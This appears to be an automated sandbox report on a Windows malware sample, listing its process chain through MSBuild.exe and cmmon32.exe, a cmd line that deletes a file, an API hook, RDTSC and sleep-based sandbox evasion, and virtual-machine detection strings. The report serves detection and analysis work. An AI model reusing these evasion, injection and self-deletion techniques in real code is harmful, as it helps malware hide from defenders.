          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.351897142.0000000008A00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameB4000.dll> vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.332432341.0000000002CB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.332432341.0000000002C9A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.342450327.0000000003BE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHIVacSim.dll2 vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeBinary or memory string: OriginalFilenameJFfV.exeD vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeReversingLabs: Detection: 15%
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeVirustotal: Detection: 36%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@512/2@4/3
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:472:120:WilError_01
          Source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
          Source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
          Source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
          Source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
          Source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: *.sln
          Source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: MSBuild MyApp.csproj /t:Clean
          Source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: /ignoreprojectextensions:.sln
          Source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmmon32.pdb source: MSBuild.exe, 00000003.00000002.379397071.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: MSBuild.exe, 00000003.00000002.379397071.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000003.00000003.329387345.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000003.331569732.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.379956956.0000000004AC0000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.375918815.000000000492E000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.568542512.0000000004C60000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.568542512.0000000004D7F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000003.00000003.329387345.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000003.331569732.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.379956956.0000000004AC0000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.375918815.000000000492E000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.568542512.0000000004C60000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.568542512.0000000004D7F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00417141 push edi; iretd 3_2_00417148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040E304 push esp; ret 3_2_0040E308
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004164D8 push eax; iretd 3_2_004164EA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00419C86 push ebx; retf 3_2_00419C87
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041D4B5 push eax; ret 3_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041D56C push eax; ret 3_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041D502 push eax; ret 3_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041D50B push eax; ret 3_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041762E push eax; ret 3_2_00417633
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00416704 push F2D26E43h; iretd 3_2_0041675E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0105D0D1 push ecx; ret 3_2_0105D0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.5788906126167275

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000000C39904 second address: 0000000000C3990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000000C39B7E second address: 0000000000C39B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe TID: 1352 Thread sleep time: -44034s >= -30000s
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe TID: 1380 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 2056 Thread sleep time: -46000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 882
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 859
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 6.5 %
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe Thread delayed: delay time: 44034
          Source: explorer.exe, 00000004.00000002.578041810.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000003.538828140.000000000F083000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW=]
          Source: explorer.exe, 00000004.00000002.584991570.000000000F03A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.559962934.000000000F039000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
          Source: explorer.exe, 00000004.00000000.356549473.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000004.00000000.356549473.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.570208987.00000000043B0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.356549473.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000002.578041810.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_01009100 mov eax, dword ptr fs:[00000030h] 3_2_01009100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01013D34 mov eax, dword ptr fs:[00000030h]3_2_01013D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CE539 mov eax, dword ptr fs:[00000030h]3_2_010CE539
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01034D3B mov eax, dword ptr fs:[00000030h]3_2_01034D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01034D3B mov eax, dword ptr fs:[00000030h]3_2_01034D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01034D3B mov eax, dword ptr fs:[00000030h]3_2_01034D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D8D34 mov eax, dword ptr fs:[00000030h]3_2_010D8D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0108A537 mov eax, dword ptr fs:[00000030h]3_2_0108A537
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01043D43 mov eax, dword ptr fs:[00000030h]3_2_01043D43
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01083540 mov eax, dword ptr fs:[00000030h]3_2_01083540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B3D40 mov eax, dword ptr fs:[00000030h]3_2_010B3D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01027D50 mov eax, dword ptr fs:[00000030h]3_2_01027D50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102C577 mov eax, dword ptr fs:[00000030h]3_2_0102C577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102C577 mov eax, dword ptr fs:[00000030h]3_2_0102C577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01032581 mov eax, dword ptr fs:[00000030h]3_2_01032581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01032581 mov eax, dword ptr fs:[00000030h]3_2_01032581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01032581 mov eax, dword ptr fs:[00000030h]3_2_01032581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01032581 mov eax, dword ptr fs:[00000030h]3_2_01032581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01002D8A mov eax, dword ptr fs:[00000030h]3_2_01002D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01002D8A mov eax, dword ptr fs:[00000030h]3_2_01002D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01002D8A mov eax, dword ptr fs:[00000030h]3_2_01002D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01002D8A mov eax, dword ptr fs:[00000030h]3_2_01002D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01002D8A mov eax, dword ptr fs:[00000030h]3_2_01002D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C2D82 mov eax, dword ptr fs:[00000030h]3_2_010C2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C2D82 mov eax, dword ptr fs:[00000030h]3_2_010C2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C2D82 mov eax, dword ptr fs:[00000030h]3_2_010C2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C2D82 mov eax, dword ptr fs:[00000030h]3_2_010C2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C2D82 mov eax, dword ptr fs:[00000030h]3_2_010C2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C2D82 mov eax, dword ptr fs:[00000030h]3_2_010C2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C2D82 mov eax, dword ptr fs:[00000030h]3_2_010C2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103FD9B mov eax, dword ptr fs:[00000030h]3_2_0103FD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103FD9B mov eax, dword ptr fs:[00000030h]3_2_0103FD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D05AC mov eax, dword ptr fs:[00000030h]3_2_010D05AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D05AC mov eax, dword ptr fs:[00000030h]3_2_010D05AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010335A1 mov eax, dword ptr fs:[00000030h]3_2_010335A1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01031DB5 mov eax, dword ptr fs:[00000030h]3_2_01031DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01031DB5 mov eax, dword ptr fs:[00000030h]3_2_01031DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01031DB5 mov eax, dword ptr fs:[00000030h]3_2_01031DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086DC9 mov eax, dword ptr fs:[00000030h]3_2_01086DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086DC9 mov eax, dword ptr fs:[00000030h]3_2_01086DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086DC9 mov eax, dword ptr fs:[00000030h]3_2_01086DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086DC9 mov ecx, dword ptr fs:[00000030h]3_2_01086DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086DC9 mov eax, dword ptr fs:[00000030h]3_2_01086DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086DC9 mov eax, dword ptr fs:[00000030h]3_2_01086DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101D5E0 mov eax, dword ptr fs:[00000030h]3_2_0101D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101D5E0 mov eax, dword ptr fs:[00000030h]3_2_0101D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CFDE2 mov eax, dword ptr fs:[00000030h]3_2_010CFDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CFDE2 mov eax, dword ptr fs:[00000030h]3_2_010CFDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CFDE2 mov eax, dword ptr fs:[00000030h]3_2_010CFDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CFDE2 mov eax, dword ptr fs:[00000030h]3_2_010CFDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B8DF1 mov eax, dword ptr fs:[00000030h]3_2_010B8DF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D740D mov eax, dword ptr fs:[00000030h]3_2_010D740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D740D mov eax, dword ptr fs:[00000030h]3_2_010D740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D740D mov eax, dword ptr fs:[00000030h]3_2_010D740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086C0A mov eax, dword ptr fs:[00000030h]3_2_01086C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086C0A mov eax, dword ptr fs:[00000030h]3_2_01086C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086C0A mov eax, dword ptr fs:[00000030h]3_2_01086C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01086C0A mov eax, dword ptr fs:[00000030h]3_2_01086C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C1C06 mov eax, dword ptr fs:[00000030h]3_2_010C1C06
